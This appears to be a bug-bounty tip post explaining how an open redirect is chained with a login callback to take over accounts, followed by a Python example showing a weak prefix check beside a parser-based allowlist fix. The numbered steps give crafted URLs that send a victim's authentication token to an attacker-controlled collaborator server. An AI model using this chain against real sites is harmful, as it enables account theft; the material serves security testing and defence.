0x19 - Account Takeover via Open Redirect
Did you know you can take over accounts using an open redirect vulnerability?
While most bug bounty programs rate open redirect vulnerabilities as Low or Informational risk, it's possible to weaponize them to take over accounts.
The trick is to combine it with a login redirect URL and capture the authentication token on your own server/collaborator.
How to do it
1. Find an open redirect in your application (e.g. https://target.com///google.com).
2. Log in to the app and review the process. You want to find a request that redirects the user back to the application along with the authentication token (e.g. https://login.target.com?callback=target.com&token=SECRET_TOKEN).
3. Craft your own malicious login URL by forcing the login request to redirect the user to your own server (e.g. https://login.target.com?callback=target.com///burpcollaborator.com).
4. Send this malicious login URL to the victim.
5. Once the victim uses it to log in, they get redirected to your own server (burpcollaborator.com) along with their authentication token.
6. Now you can collect the token and use it to log in and take over the account.
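The weak point this chain relies on is a callback check that trusts the raw string. The following is an added example, not code from the original post, written in Python and assuming the hostnames and the callback parameter used above: a prefix check of the kind the crafted value slips past, beside a parser-based allowlist check that refuses it and returns a safe redirect target instead.

```python
from urllib.parse import urlsplit

# Assumed allowlist and fallback landing page for the login callback.
ALLOWED_HOSTS = {"target.com", "www.target.com"}
DEFAULT_CALLBACK = "https://target.com/"


def weak_callback_ok(callback: str) -> bool:
    """A prefix match on the raw string: accepts 'target.com///burpcollaborator.com'."""
    return callback.startswith("target.com")


def safe_callback(callback: str) -> str:
    """Return a redirect target that stays on an allowed host, or DEFAULT_CALLBACK
    when the supplied value cannot be trusted."""
    # Browsers normalise backslashes and control characters differently from
    # server-side parsers, so refuse them instead of trying to interpret them.
    if "\\" in callback or any(c.isspace() or ord(c) < 0x20 for c in callback):
        return DEFAULT_CALLBACK
    parts = urlsplit(callback)
    # Require an absolute https URL. Scheme-less values such as
    # '//burpcollaborator.com' or 'target.com///burpcollaborator.com' would be
    # resolved by the victim's browser, not by us, so they are rejected here.
    if parts.scheme != "https" or not parts.hostname:
        return DEFAULT_CALLBACK
    # 'target.com@burpcollaborator.com' parses with the real host in .hostname;
    # compare the parsed host and reject any userinfo outright.
    if parts.username is not None or parts.password is not None:
        return DEFAULT_CALLBACK
    try:
        port = parts.port
    except ValueError:
        return DEFAULT_CALLBACK
    if parts.hostname not in ALLOWED_HOSTS or port not in (None, 443):
        return DEFAULT_CALLBACK
    # Rebuild the Location value from the parsed pieces: lowercase host, no
    # userinfo, no fragment, and repeated leading slashes collapsed so the
    # path cannot be mistaken for a second authority.
    path = "/" + parts.path.lstrip("/")
    query = f"?{parts.query}" if parts.query else ""
    return f"https://{parts.hostname}{path}{query}"
```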